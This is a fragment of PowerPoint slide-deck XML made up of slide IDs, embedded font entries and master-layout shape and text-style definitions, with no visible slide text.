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8" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId30"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId31"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="373" r:id="rId3"/>
    <p:sldId id="444" r:id="rId4"/>
    <p:sldId id="446" r:id="rId5"/>
    <p:sldId id="448" r:id="rId6"/>
    <p:sldId id="447" r:id="rId7"/>
    <p:sldId id="449" r:id="rId8"/>
    <p:sldId id="445" r:id="rId9"/>
    <p:sldId id="450" r:id="rId10"/>
    <p:sldId id="452" r:id="rId11"/>
    <p:sldId id="455" r:id="rId12"/>
    <p:sldId id="456" r:id="rId13"/>
    <p:sldId id="453" r:id="rId14"/>
    <p:sldId id="454" r:id="rId15"/>
    <p:sldId id="457" r:id="rId16"/>
    <p:sldId id="459" r:id="rId17"/>
    <p:sldId id="458" r:id="rId18"/>
    <p:sldId id="460" r:id="rId19"/>
    <p:sldId id="461" r:id="rId20"/>
    <p:sldId id="462" r:id="rId21"/>
    <p:sldId id="463" r:id="rId22"/>
    <p:sldId id="464" r:id="rId23"/>
    <p:sldId id="466" r:id="rId24"/>
    <p:sldId id="465" r:id="rId25"/>
    <p:sldId id="467" r:id="rId26"/>
    <p:sldId id="468" r:id="rId27"/>
    <p:sldId id="469" r:id="rId28"/>
    <p:sldId id="428" r:id="rId29"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Dosis" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
      <p:regular r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Sniglet" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
      <p:italic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
      <p:italic r:id="rId40"/>
      <p:boldItalic r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Helvetica" panose="020B0604020202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27A8D3-8E02-4833-AC72-0F9BAFB9D0F3}">
  <a:tblStyle styleId="{B527A8D3-8E02-4833-AC72-0F9BAFB9D0F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194" y="444"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="125" d="100"/>
          <a:sy n="125" d="100"/>
        </p:scale>
        <p:origin x="261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C6035F-FE84-4C26-97C1-339C346519BD}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/25/2018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3F7B4E-FD80-43CB-963E-532EA0B6C493}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4740112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tif>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6260911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4032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61"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305100" y="1161050"/>
            <a:ext cx="6153000" cy="1159800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782011" y="5350391"/>
            <a:ext cx="794875" cy="985737"/>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4" name="Google Shape;164;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4183587"/>
            <a:ext cx="782014" cy="890356"/>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5" name="Google Shape;165;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4083420" y="4552720"/>
            <a:ext cx="370865" cy="809588"/>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6" name="Google Shape;166;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136364" y="4258654"/>
            <a:ext cx="730671" cy="895811"/>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7" name="Google Shape;167;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5459967" y="4416012"/>
            <a:ext cx="805934" cy="75083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8" name="Google Shape;168;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8422778" y="4477143"/>
            <a:ext cx="873792" cy="600260"/>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9" name="Google Shape;169;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4609435" y="4255840"/>
            <a:ext cx="657208" cy="679227"/>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0" name="Google Shape;170;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4478200" y="5125134"/>
            <a:ext cx="919681" cy="950908"/>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1" name="Google Shape;171;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2703231" y="5166838"/>
            <a:ext cx="890356" cy="7068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2" name="Google Shape;172;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2174861" y="4316456"/>
            <a:ext cx="829755" cy="78016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3" name="Google Shape;173;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1405680" y="4316447"/>
            <a:ext cx="599146" cy="706812"/>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4" name="Google Shape;174;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2739934" y="5943858"/>
            <a:ext cx="816944" cy="313967"/>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5" name="Google Shape;175;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7204740" y="5639064"/>
            <a:ext cx="1040884" cy="73062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6" name="Google Shape;176;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7204749" y="4234732"/>
            <a:ext cx="684732" cy="721463"/>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7" name="Google Shape;177;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5320526" y="5859816"/>
            <a:ext cx="525046" cy="372666"/>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8" name="Google Shape;178;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8434691" y="5859361"/>
            <a:ext cx="508532" cy="324976"/>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9" name="Google Shape;179;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3867035" y="5559626"/>
            <a:ext cx="570935" cy="567282"/>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0" name="Google Shape;180;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8033710" y="4183572"/>
            <a:ext cx="541560" cy="67927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1" name="Google Shape;181;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629104" y="5158595"/>
            <a:ext cx="734324" cy="723314"/>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2" name="Google Shape;182;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305379" y="5225175"/>
            <a:ext cx="275434" cy="24420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3" name="Google Shape;183;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8575263" y="5213184"/>
            <a:ext cx="690236" cy="510383"/>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4" name="Google Shape;184;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918032" y="4547743"/>
            <a:ext cx="317620" cy="659010"/>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5" name="Google Shape;185;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1920742">
            <a:off x="5765357" y="5344289"/>
            <a:ext cx="884797" cy="750834"/>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6" name="Google Shape;186;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-3496844">
            <a:off x="174158" y="5639860"/>
            <a:ext cx="537852" cy="464440"/>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7" name="Google Shape;187;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7576503" y="5096629"/>
            <a:ext cx="846269" cy="598458"/>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8" name="Google Shape;188;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6555113" y="4151741"/>
            <a:ext cx="493819" cy="63153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9" name="Google Shape;189;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6511524" y="4836207"/>
            <a:ext cx="666366" cy="752689"/>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0" name="Google Shape;190;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1924330" y="5873179"/>
            <a:ext cx="681078" cy="455287"/>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1" name="Google Shape;191;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728124" y="5744695"/>
            <a:ext cx="308462" cy="330481"/>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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Google Shape;477;p10"/>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8" name="Google Shape;478;p10"/>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9" name="Google Shape;479;p10"/>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0" name="Google Shape;480;p10"/>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1" name="Google Shape;481;p10"/>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2" name="Google Shape;482;p10"/>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3" name="Google Shape;483;p10"/>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4" name="Google Shape;484;p10"/>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5" name="Google Shape;485;p10"/>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6" name="Google Shape;486;p10"/>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7" name="Google Shape;487;p10"/>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8" name="Google Shape;488;p10"/>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9" name="Google Shape;489;p10"/>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0" name="Google Shape;490;p10"/>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1" name="Google Shape;491;p10"/>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2" name="Google Shape;492;p10"/>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3" name="Google Shape;493;p10"/>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4" name="Google Shape;494;p10"/>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5" name="Google Shape;495;p10"/>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6" name="Google Shape;496;p10"/>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7" name="Google Shape;497;p10"/>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8" name="Google Shape;498;p10"/>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9" name="Google Shape;499;p10"/>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0" name="Google Shape;500;p10"/>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1" name="Google Shape;501;p10"/>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2" name="Google Shape;502;p10"/>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3" name="Google Shape;503;p10"/>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4" name="Google Shape;504;p10"/>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5" name="Google Shape;505;p10"/>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6" name="Google Shape;506;p10"/>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7" name="Google Shape;507;p10"/>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8" name="Google Shape;508;p10"/>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9" name="Google Shape;509;p10"/>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0" name="Google Shape;510;p10"/>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1" name="Google Shape;511;p10"/>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2" name="Google Shape;512;p10"/>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3" name="Google Shape;513;p10"/>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4" name="Google Shape;514;p10"/>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5" name="Google Shape;515;p10"/>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6" name="Google Shape;516;p10"/>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7" name="Google Shape;517;p10"/>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8" name="Google Shape;518;p1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28650" y="4767264"/>
            <a:ext cx="2057400" cy="273844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D786C765-F843-4CE9-B389-075D89EB78BB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/25/2018</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3028950" y="4767264"/>
            <a:ext cx="3086100" cy="273844"/>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E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3263522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92"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p3"/>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lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p3"/>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lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412080" y="4661638"/>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6" name="Google Shape;196;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3968826" y="4000288"/>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7" name="Google Shape;197;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283364"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8" name="Google Shape;198;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="57465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9" name="Google Shape;199;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="70636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0" name="Google Shape;200;p3"/>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1" name="Google Shape;201;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="65815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2" name="Google Shape;202;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="65071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3" name="Google Shape;203;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="55010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4" name="Google Shape;204;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52015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5" name="Google Shape;205;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765584"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6" name="Google Shape;206;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="55218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7" name="Google Shape;207;p3"/>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8" name="Google Shape;208;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
